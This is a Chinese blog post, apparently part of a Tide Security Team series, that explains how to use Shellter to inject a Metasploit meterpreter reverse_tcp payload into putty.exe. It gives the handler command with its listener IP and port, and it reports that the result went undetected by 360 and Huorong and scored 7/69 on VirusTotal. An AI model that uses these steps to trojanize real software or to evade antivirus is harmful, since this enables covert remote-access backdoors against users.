远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

admin 2022年5月19日10:37:07程序逆向评论24 views2112字阅读7分2秒阅读模式

本专题文章导航

1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

2、远控免杀专题(2)-msfvenom隐藏的参数:https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w

3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

4、远控免杀专题(4)-Evasion模块(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

5、远控免杀专题(5)-Veil免杀(VT免杀率23/71):https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw

6、远控免杀专题(6)-Venom免杀(VT免杀率11/71):https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ

7、远控免杀专题(7)-Shellter免杀(VT免杀率7/69):本文

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


免杀能力一览表

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火绒版本5.0.33.13(2019.12.12),360安全卫士12.0.0.2001(2019.12.17)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。


前言

Shellter和Venom、Veil是三大老牌免杀工具,Shellter是一个开源的免杀工具,利用动态Shellcode注入或者命令来实现免杀的效果。

安装Shellter

1、kali中已经自带shellter,可在图形界面中直接执行shellter命令即可。

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

2、ubuntu系统中apt安装

apt-get updateapt-get install shellter

3、手动下载windows版

官方下载站点https://www.shellterproject.com/download/

下载后解压,无需安装,cmd下可直接使用

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

生成payload(VT免杀率7/69)

我就直接用kali自带的shellter进行演示,需要提前准备一个pe文件作为被注入程序。我还是用之前选的putty.exe来进行测试。

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

之后程序会把putty.exe进行备份,因为生成的payload会自动覆盖原来的putty.exe

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

还是选择windows/meterpreter/reverse_tcp作为payload

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

上面有个选项Enable Stealth Mode,是否启用隐身模式,启用后免杀效果会变差,建议不启用。

全程自动化生成,最终的生成文件会替换原来的putty.exe

通过对比可发现程序稍微变大了

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

在msf中使用handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp进行监听

在测试机中执行生成的putty.exe,360和火绒均可免杀

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

msf正常上线

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

virustotal.com中7/69个报毒,卡巴、瑞星、微软三个都没bypass。。

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

小结

Shellter安装非常简单,使用也非常便捷,而且生成的payload免杀效果也都比较好,windows和linux下都可以使用,实在是居家旅行、**灭口必备良药。我是用的自动模式进行生产payload,你可以根据自己的需要进行手动配置,这样生成的payload免杀效果会更好。

因为Shellter生成的shellcode是动态的,所以被查杀的几率也有所不同,测试过几次自动化生成的payload,最好的秒杀效果是4/71,最差的15/70,整体来说也算不错了。

参考整理

msf免杀及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html





E




N




D






远控免杀专题(7)-Shellter免杀(VT免杀率7/69)


guān




zhù







men





Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。

想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

远控免杀专题(7)-Shellter免杀(VT免杀率7/69)





原文始发于微信公众号(白帽子):远控免杀专题(7)-Shellter免杀(VT免杀率7/69)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月19日10:37:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  远控免杀专题(7)-Shellter免杀(VT免杀率7/69) http://cn-sec.com/archives/1019683.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: